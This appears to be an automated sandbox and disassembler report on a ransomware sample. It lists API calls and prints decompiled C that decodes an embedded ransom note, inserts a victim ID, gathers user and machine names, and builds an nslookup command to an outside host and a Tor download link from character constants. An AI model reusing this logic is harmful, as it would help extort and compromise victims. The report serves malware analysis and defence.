                                        0x0f9d3647
                                        0x0f9d364a
                                        0x0f9d3651
                                        0x0f9d3658
                                        0x0f9d3663
                                        0x0f9d3669
                                        0x0f9d3676
                                        0x0f9d367e
                                        0x0f9d367f
                                        0x0f9d368a
                                        0x0f9d368f
                                        0x0f9d3693
                                        0x0f9d369b
                                        0x0f9d36a0
                                        0x0f9d36b0
                                        0x0f9d36c6
                                        0x0f9d36c8
                                        0x0f9d36de
                                        0x0f9d36e4
                                        0x0f9d36e9
                                        0x0f9d36ec
                                        0x0f9d36f1
                                        0x0f9d36f3
                                        0x0f9d36f8
                                        0x0f9d3703
                                        0x0f9d3706
                                        0x0f9d370a
                                        0x0f9d3711
                                        0x0f9d371f
                                        0x0f9d3724
                                        0x0f9d3729
                                        0x0f9d3767
                                        0x0f9d376c
                                        0x0f9d3771
                                        0x0f9d37a0
                                        0x0f9d37a5
                                        0x0f9d37c3
                                        0x0f9d37c5
                                        0x0f9d37cb
                                        0x0f9d380b
                                        0x0f9d3819
                                        0x0f9d381f
                                        0x0f9d3826
                                        0x0f9d3828
                                        0x0f9d382a
                                        0x0f9d382d
                                        0x0f9d3835
                                        0x0f9d3850
                                        0x0f9d3855
                                        0x0f9d385b
                                        0x0f9d3867
                                        0x0f9d386a
                                        0x0f9d386d
                                        0x0f9d386f
                                        0x0f9d3872
                                        0x0f9d3875
                                        0x0f9d387a
                                        0x0f9d3880
                                        0x0f9d3880
                                        0x0f9d3881
                                        0x0f9d3885
                                        0x0f9d3885
                                        0x0f9d389b
                                        0x0f9d38a2
                                        0x0f9d38a7
                                        0x0f9d38aa
                                        0x0f9d38ad
                                        0x0f9d38c2
                                        0x0f9d38da
                                        0x0f9d38df
                                        0x0f9d38e2
                                        0x0f9d38e2
                                        0x0f9d38ef
                                        0x0f9d3902
                                        0x0f9d391d
                                        0x0f9d391f
                                        0x0f9d3924
                                        0x0f9d3924
                                        0x0f9d392f
                                        0x0f9d3935
                                        0x0f9d393a
                                        0x0f9d3832
                                        0x00000000
                                        0x0f9d3832
                                        0x0f9d393a
                                        0x00000000
                                        0x0f9d3855
                                        0x0f9d3950
                                        0x0f9d3956
                                        0x0f9d3967
                                        0x0f9d397c
                                        0x0f9d398c
                                        0x0f9d398c
                                        0x0f9d3993
                                        0x0f9d39a6
                                        0x0f9d39a9
                                        0x0f9d39b5
                                        0x0f9d39c1
                                        0x0f9d39c7
                                        0x0f9d39cf
                                        0x0f9d39cf
                                        0x0f9d39d5
                                        0x0f9d37cd
                                        0x0f9d37db
                                        0x0f9d37e7
                                        0x0f9d37e9
                                        0x0f9d37ec
                                        0x0f9d37f4
                                        0x0f9d37f4
                                        0x0f9d3773
                                        0x0f9d3773
                                        0x0f9d377f
                                        0x0f9d3782
                                        0x0f9d378a
                                        0x0f9d378a
                                        0x0f9d372b
                                        0x0f9d3738
                                        0x0f9d3744
                                        0x0f9d3747
                                        0x0f9d374f
                                        0x0f9d374f
                                        0x0f9d39e2
                                        0x0f9d39ee

                                        APIs
                                        • GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0F9D35F4
                                        • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0F9D35FF
                                        • VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0F9D363A
                                        • lstrcpyW.KERNEL32 ref: 0F9D3658
                                        • lstrcatW.KERNEL32(00000000,0047002E), ref: 0F9D3663
                                          • Part of subcall function 0F9D82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D82C0
                                          • Part of subcall function 0F9D82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F9D82E8
                                          • Part of subcall function 0F9D82A0: GetModuleHandleA.KERNEL32(?), ref: 0F9D833D
                                          • Part of subcall function 0F9D82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D834B
                                          • Part of subcall function 0F9D82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D835A
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D837E
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D838C
                                          • Part of subcall function 0F9D82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83A0
                                          • Part of subcall function 0F9D82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F9D292B), ref: 0F9D83AE
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36C6
                                        • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0F9D36F1
                                          • Part of subcall function 0F9D6530: EnterCriticalSection.KERNEL32(0F9E2A48,?,0F9D3724,00000000,00000000,00000000,?,00000800), ref: 0F9D653B
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D655E
                                          • Part of subcall function 0F9D6530: GetLastError.KERNEL32(?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6568
                                          • Part of subcall function 0F9D6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F9D3724,00000000,00000000,00000000), ref: 0F9D6584
                                        • MessageBoxA.USER32 ref: 0F9D3738
                                        • GetLastError.KERNEL32 ref: 0F9D3773
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D39E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
                                        • String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
                                        • API String ID: 1177701972-69869980
                                        • Opcode ID: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction ID: 737e6f7a10b0b45555cb555ef9b09ef4ccc2331dd80173a5a9ed17db930fa17b
                                        • Opcode Fuzzy Hash: 9abc1fbbf9b03e4d9563de6e938be6aa7115963f5177201fac3159c19bded5ad
                                        • Instruction Fuzzy Hash: F2C18E71E40318BBEB218B90DC46FEEBBB8BF48711F208115F640BA1C2DBB869548B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 363 f9d40e0-f9d40f5 364 f9d43c8-f9d43cd 363->364 365 f9d40fb-f9d4160 call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 363->365 372 f9d4171 365->372 373 f9d4162-f9d416b 365->373 375 f9d4173-f9d41ba call f9d6f40 call f9d8090 lstrlenW 372->375 373->372 374 f9d416d-f9d416f 373->374 374->375 380 f9d41c0-f9d41d2 375->380 380->380 381 f9d41d4 380->381 382 f9d41e0-f9d41ed 381->382 382->382 383 f9d41ef-f9d420c call f9d8090 382->383 386 f9d420e 383->386 387 f9d4286-f9d4375 383->387 390 f9d4210-f9d4236 lstrcpyW lstrlenW 386->390 388 f9d43a8-f9d43c3 VirtualFree call f9d7c10 387->388 389 f9d4377-f9d4392 VirtualAlloc 387->389 388->364 389->388 391 f9d4394-f9d43a5 wsprintfW 389->391 390->387 393 f9d4238-f9d423d 390->393 391->388 394 f9d4243-f9d424b 393->394 395 f9d424d 394->395 396 f9d4277-f9d4284 394->396 397 f9d4250-f9d4256 395->397 396->387 396->394 398 f9d425c-f9d4262 397->398 399 f9d43ce-f9d43d5 397->399 400 f9d426d-f9d4271 398->400 401 f9d4264-f9d426b 398->401 399->390 400->396 400->399 401->397 401->400
                                        C-Code - Quality: 49%
                                        			E0F9D40E0(void* __ecx, void* __edx) {
                                        				char _v148;
                                        				char _v152;
                                        				WCHAR* _v156;
                                        				void* _v160;
                                        				intOrPtr _v168;
                                        				intOrPtr _v172;
                                        				intOrPtr _v176;
                                        				intOrPtr _v180;
                                        				intOrPtr _v184;
                                        				intOrPtr _v188;
                                        				intOrPtr _v192;
                                        				intOrPtr _v196;
                                        				intOrPtr _v200;
                                        				intOrPtr _v204;
                                        				intOrPtr _v208;
                                        				intOrPtr _v212;
                                        				intOrPtr _v216;
                                        				intOrPtr _v220;
                                        				intOrPtr _v224;
                                        				intOrPtr _v228;
                                        				intOrPtr _v232;
                                        				char _v236;
                                        				intOrPtr _v240;
                                        				void* _v244;
                                        				intOrPtr _v248;
                                        				intOrPtr _v252;
                                        				intOrPtr _v256;
                                        				intOrPtr _v260;
                                        				intOrPtr _v264;
                                        				intOrPtr _v268;
                                        				intOrPtr _v272;
                                        				intOrPtr _v276;
                                        				char _v280;
                                        				void* _t54;
                                        				void* _t58;
                                        				void* _t60;
                                        				signed int _t61;
                                        				void* _t62;
                                        				WCHAR* _t65;
                                        				signed short _t69;
                                        				signed short* _t70;
                                        				WCHAR* _t77;
                                        				signed int _t82;
                                        				signed int _t83;
                                        				void* _t87;
                                        				void* _t90;
                                        				long _t93;
                                        				WCHAR* _t94;
                                        				signed int _t97;
                                        				void* _t98;
                                        				WCHAR* _t100;
                                        				void* _t102;
                                        
                                        				if( *0xf9e2a64 != 0) {
                                        					L24:
                                        					return _t54;
                                        				}
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_push(0);
                                        				E0F9D39F0( &_v148);
                                        				E0F9D7330( &_v236, __edx);
                                        				_t97 = E0F9D7140( &_v236);
                                        				_t93 = 0x42 + _t97 * 2;
                                        				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
                                        				_v244 = _t58;
                                        				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
                                        					_t98 = 0;
                                        				} else {
                                        					_t98 = _t58;
                                        				}
                                        				E0F9D6F40( &_v152, _t98);
                                        				_t60 = E0F9D8090(_t98, L"ransom_id=");
                                        				_t61 = lstrlenW(L"ransom_id=");
                                        				asm("movdqa xmm1, [0xf9e04a0]");
                                        				_t77 = 0xf9e2000;
                                        				_t87 = 0xa3;
                                        				_t100 = _t60 + _t61 * 2;
                                        				_t62 = 0xa30;
                                        				_v160 = _t100;
                                        				do {
                                        					_t13 =  &(_t77[8]); // 0x44004e
                                        					_t77 = _t13;
                                        					asm("movdqu xmm0, [ecx-0x10]");
                                        					asm("pxor xmm0, xmm1");
                                        					asm("movdqu [ecx-0x10], xmm0");
                                        					_t87 = _t87 - 1;
                                        				} while (_t87 != 0);
                                        				do {
                                        					 *(_t62 + 0xf9e2000) =  *(_t62 + 0xf9e2000) ^ 0x00000005;
                                        					_t62 = _t62 + 1;
                                        				} while (_t62 < 0xa38);
                                        				 *0xf9e2a64 = 0xf9e2000;
                                        				_t94 = E0F9D8090(0xf9e2000, L"{USERID}");
                                        				if(_t94 == 0) {
                                        					L20:
                                        					_v280 = 0x740068;
                                        					_v276 = 0x700074;
                                        					_v272 = 0x3a0073;
                                        					_v268 = 0x2f002f;
                                        					_v264 = 0x770077;
                                        					_v260 = 0x2e0077;
                                        					_v256 = 0x6f0074;
                                        					_v252 = 0x700072;
                                        					_v248 = 0x6f0072;
                                        					_v244 = 0x65006a;
                                        					_v240 = 0x740063;
                                        					_v236 = 0x6f002e;
                                        					_v232 = 0x670072;
                                        					_v228 = 0x64002f;
                                        					_v224 = 0x77006f;
                                        					_v220 = 0x6c006e;
                                        					_v216 = 0x61006f;
                                        					_v212 = 0x2f0064;
                                        					_v208 = 0x6f0064;
                                        					_v204 = 0x6e0077;
                                        					_v200 = 0x6f006c;
                                        					_v196 = 0x640061;
                                        					_v192 = 0x65002d;
                                        					_v188 = 0x730061;
                                        					_v184 = 0x2e0079;
                                        					_v180 = 0x740068;
                                        					_v176 = 0x6c006d;
                                        					_v172 = 0x65002e;
                                        					_v168 = 0x6e;
                                        					if( *0xf9e2a44 == 0) {
                                        						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        						 *0xf9e2a44 = _t65;
                                        						if(_t65 != 0) {
                                        							wsprintfW(_t65, L"%s",  &_v280);
                                        						}
                                        					}
                                        					VirtualFree(_v160, 0, 0x8000);
                                        					_t54 = E0F9D7C10( &_v152);
                                        					goto L24;
                                        				}
                                        				while(1) {
                                        					L11:
                                        					lstrcpyW(_t94, _t100);
                                        					_t94[lstrlenW(_t94)] = 0x20;
                                        					_t94 = 0xf9e2000;
                                        					_t69 =  *0xf9e2000; // 0xfeff
                                        					if(_t69 == 0) {
                                        						goto L20;
                                        					}
                                        					_t82 = _t69 & 0x0000ffff;
                                        					_t102 = 0xf9e2000 - L"{USERID}";
                                        					do {
                                        						_t70 = L"{USERID}";
                                        						if(_t82 == 0) {
                                        							goto L19;
                                        						}
                                        						while(1) {
                                        							_t83 =  *_t70 & 0x0000ffff;
                                        							if(_t83 == 0) {
                                        								break;
                                        							}
                                        							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
                                        							if(_t90 != 0) {
                                        								L18:
                                        								if( *_t70 == 0) {
                                        									break;
                                        								}
                                        								goto L19;
                                        							}
                                        							_t70 =  &(_t70[1]);
                                        							if( *(_t102 + _t70) != _t90) {
                                        								continue;
                                        							}
                                        							goto L18;
                                        						}
                                        						_t100 = _v156;
                                        						goto L11;
                                        						L19:
                                        						_t20 =  &(_t94[1]); // 0x2d002d
                                        						_t82 =  *_t20 & 0x0000ffff;
                                        						_t94 =  &(_t94[1]);
                                        						_t102 = _t102 + 2;
                                        					} while (_t82 != 0);
                                        					goto L20;
                                        				}
                                        				goto L20;
                                         			}

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4151
                                        • lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4193
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                         • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                         • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4100118565-2385900546
                                        • Opcode ID: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction ID: c7647e25ff9f3e2b9cd667db2ca99cf6af73a741ddd84f731f6c9557aa171e64
                                        • Opcode Fuzzy Hash: a9b34f49fc5e76f8c935f89cf5bfde59dc66cf3a9a0b75e0a45e5569a583decc
                                        • Instruction Fuzzy Hash: FB71E270508340DBE730DF14C909B6ABBEAFB80759F60891CF6855B2D2DBF99548CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
                                        				short _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				char _v64;
                                        				short _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				char _v124;
                                        				struct _SECURITY_ATTRIBUTES _v136;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t45;
                                        				void* _t57;
                                        				CHAR* _t64;
                                        				void* _t66;
                                        
                                        				_v64 = 0x73006e;
                                        				_t57 = __edx;
                                        				_v8 = 0;
                                        				_t64 = __ecx;
                                        				_v68 = 0;
                                        				_v60 = 0x6f006c;
                                        				_t43 =  !=  ?  &_v124 :  &_v64;
                                        				_v56 = 0x6b006f;
                                        				_a4 =  !=  ?  &_v124 :  &_v64;
                                        				_v52 = 0x700075;
                                        				_v48 = 0x250020;
                                        				_v44 = 0x200053;
                                        				_v40 = 0x6e0064;
                                        				_v36 = 0x310073;
                                        				_v32 = 0x73002e;
                                        				_v28 = 0x70006f;
                                        				_v24 = 0x6f0072;
                                        				_v20 = 0x6e0064;
                                        				_v16 = 0x2e0073;
                                        				_v12 = 0x750072;
                                        				_v124 = 0x73006e;
                                        				_v120 = 0x6f006c;
                                        				_v116 = 0x6b006f;
                                        				_v112 = 0x700075;
                                        				_v108 = 0x250020;
                                        				_v104 = 0x200053;
                                        				_v100 = 0x6e0064;
                                        				_v96 = 0x320073;
                                        				_v92 = 0x73002e;
                                        				_v88 = 0x70006f;
                                        				_v84 = 0x6f0072;
                                        				_v80 = 0x6e0064;
                                        				_v76 = 0x2e0073;
                                        				_v72 = 0x750072;
                                        				_v136.nLength = 0xc;
                                        				_v136.bInheritHandle = 1;
                                        				_v136.lpSecurityDescriptor = 0;
                                        				_t45 = CreatePipe(0xf9e2a70, 0xf9e2a6c,  &_v136, 0);
                                        				if(_t45 != 0) {
                                        					_t45 = SetHandleInformation( *0xf9e2a70, 1, 0);
                                        					if(_t45 == 0) {
                                        						goto L1;
                                        					} else {
                                        						CreatePipe(0xf9e2a68, 0xf9e2a74,  &_v136, 0);
                                        						_t45 = SetHandleInformation( *0xf9e2a74, 1, 0);
                                        						if(_t45 == 0) {
                                        							goto L1;
                                        						} else {
                                        							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                        							if(_t66 == 0) {
                                        								lstrcpyA(_t64, "fabian wosar <3");
                                        								return 0;
                                        							} else {
                                        								wsprintfW(_t66, _a4, _t57);
                                        								E0F9D4C40(_t66);
                                        								E0F9D4DE0(_t57, _t64, _t57, _t64, _t66);
                                        								VirtualFree(_t66, 0, 0x8000);
                                        								return 0;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					return _t45 | 0xffffffff;
                                        				}
                                         			}

                                        APIs
                                        • CreatePipe.KERNEL32(0F9E2A70,0F9E2A6C,?,00000000,00000001,00000001,00000000), ref: 0F9D4FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FCD
                                        • CreatePipe.KERNEL32(0F9E2A68,0F9E2A74,0000000C,00000000), ref: 0F9D4FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F9D500A
                                        • wsprintfW.USER32 ref: 0F9D501B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
• Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction ID: 163e21a783c1a5fa8a35e4008c080839245fdbe60ce28d39c22a4fc74c2d00d9
                                        • Opcode Fuzzy Hash: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction Fuzzy Hash: 22418270E053189BEB20CF95E8487EDBFB5FB04755F208129E504AB292C7F905988F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                        				void* _t41;
                                        				void* _t44;
                                        				WCHAR* _t45;
                                        				signed short _t49;
                                        				signed short* _t50;
                                        				signed int _t55;
                                        				signed int _t56;
                                        				void* _t59;
                                        				WCHAR* _t60;
                                        				WCHAR* _t62;
                                        				void* _t65;
                                        
                                        				_t41 = __eax;
                                        				do {
                                        					 *(_t41 + 0xf9e2000) =  *(_t41 + 0xf9e2000) ^ 0x00000005;
                                        					_t41 = _t41 + 1;
                                        				} while (_t41 < 0xa38);
                                        				 *0xf9e2a64 = 0xf9e2000;
                                        				_t60 = E0F9D8090(0xf9e2000, L"{USERID}");
                                        				if(_t60 != 0) {
                                        					while(1) {
                                        						L4:
                                        						lstrcpyW(_t60, _t62);
                                        						_t60[lstrlenW(_t60)] = 0x20;
                                        						_t60 = 0xf9e2000;
                                        						_t49 =  *0xf9e2000; // 0xfeff
                                        						if(_t49 == 0) {
                                        							goto L13;
                                        						}
                                        						_t55 = _t49 & 0x0000ffff;
                                        						_t65 = 0xf9e2000 - L"{USERID}";
                                        						do {
                                        							_t50 = L"{USERID}";
                                        							if(_t55 == 0) {
                                        								goto L12;
                                        							} else {
                                        								while(1) {
                                        									_t56 =  *_t50 & 0x0000ffff;
                                        									if(_t56 == 0) {
                                        										break;
                                        									}
                                        									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                        									if(_t59 != 0) {
                                        										L11:
                                        										if( *_t50 == 0) {
                                        											break;
                                        										} else {
                                        											goto L12;
                                        										}
                                        									} else {
                                        										_t50 =  &(_t50[1]);
                                        										if( *(_t65 + _t50) != _t59) {
                                        											continue;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									}
                                        									goto L13;
                                        								}
                                        								_t62 = _a132;
                                        								goto L4;
                                        							}
                                        							goto L13;
                                        							L12:
                                        							_t7 =  &(_t60[1]); // 0x2d002d
                                        							_t55 =  *_t7 & 0x0000ffff;
                                        							_t60 =  &(_t60[1]);
                                        							_t65 = _t65 + 2;
                                        						} while (_t55 != 0);
                                        						goto L13;
                                        					}
                                        				}
                                        				L13:
                                        				_a8 = 0x740068;
                                        				_a12 = 0x700074;
                                        				_a16 = 0x3a0073;
                                        				_a20 = 0x2f002f;
                                        				_a24 = 0x770077;
                                        				_a28 = 0x2e0077;
                                        				_a32 = 0x6f0074;
                                        				_a36 = 0x700072;
                                        				_a40 = 0x6f0072;
                                        				_a44 = 0x65006a;
                                        				_a48 = 0x740063;
                                        				_a52 = 0x6f002e;
                                        				_a56 = 0x670072;
                                        				_a60 = 0x64002f;
                                        				_a64 = 0x77006f;
                                        				_a68 = 0x6c006e;
                                        				_a72 = 0x61006f;
                                        				_a76 = 0x2f0064;
                                        				_a80 = 0x6f0064;
                                        				_a84 = 0x6e0077;
                                        				_a88 = 0x6f006c;
                                        				_a92 = 0x640061;
                                        				_a96 = 0x65002d;
                                        				_a100 = 0x730061;
                                        				_a104 = 0x2e0079;
                                        				_a108 = 0x740068;
                                        				_a112 = 0x6c006d;
                                        				_a116 = 0x65002e;
                                        				_a120 = 0x6e;
